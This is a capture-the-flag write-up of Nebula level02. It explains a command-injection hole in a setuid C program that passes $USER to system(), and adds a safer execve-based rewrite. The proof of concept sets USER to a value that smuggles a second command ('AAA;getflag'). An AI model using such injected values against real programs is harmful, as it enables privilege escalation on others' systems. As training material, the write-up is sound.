Exploit-Exercises Nebula - Level02

Executive Summary

The level02 challenge of Exploit-Exercises consists of changing the value of the $USER environment variable in order to manipulate how the program works.

About

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the level02 account with the password level02. Files for this level can be found in /home/flag02.

Source code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  char *buffer;

  gid_t gid;
  uid_t uid;

  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  buffer = NULL;

  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
  printf("about to call system(\"%s\")\n", buffer);
  
  system(buffer);
}

Proof Of Concept

The C source code above uses the asprintf function to concatenate strings, taking the value of $USER as returned by getenv(). The resulting string is then passed to system().

To solve this challenge, we can change the value of $USER so that the program runs the command we want.

sh-4.2$ USER="AAA;getflag"
sh-4.2$ ./flag02
about to call system("/bin/echo AAA;getflag is cool")
AAA
You have successfully executed getflag on a target account
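
The command runs because system() hands the whole string to /bin/sh, which treats ';' as a command separator. As an added example (not part of the original write-up or the Nebula source), the hypothetical helper echo_no_shell below passes the name to execve as a single argv element with a fixed environment, so the same input is only printed.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper (not in the original program): run /bin/echo with
 * `name` as one argv element and capture the first line of its output.
 * No shell parses the string, so ';' in `name` is plain data.
 * Returns the child's exit status, or -1 on error. */
static int echo_no_shell(const char *name, char *out, size_t outlen)
{
    int fds[2];
    if (pipe(fds) != 0) return -1;
    pid_t pid = fork();
    if (pid < 0) { close(fds[0]); close(fds[1]); return -1; }
    if (pid == 0) {
        /* Child: fixed program path, fixed environment, argv array. */
        char *argv[] = { "echo", (char *)name, "is", "cool", NULL };
        char *envp[] = { "PATH=/bin:/usr/bin", NULL };
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]);
        close(fds[1]);
        execve("/bin/echo", argv, envp);
        _exit(127);               /* reached only if execve failed */
    }
    close(fds[1]);
    ssize_t n = read(fds[0], out, outlen - 1);
    close(fds[0]);
    int status;
    waitpid(pid, &status, 0);
    if (n < 0) return -1;
    out[n] = '\0';
    out[strcspn(out, "\n")] = '\0';   /* keep the first line only */
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char line[256];
    /* Constructed sample input: the value used in the session above. */
    if (echo_no_shell("AAA;getflag", line, sizeof line) == 0)
        printf("%s\n", line);     /* the ';' is echoed, not executed */
    return 0;
}
```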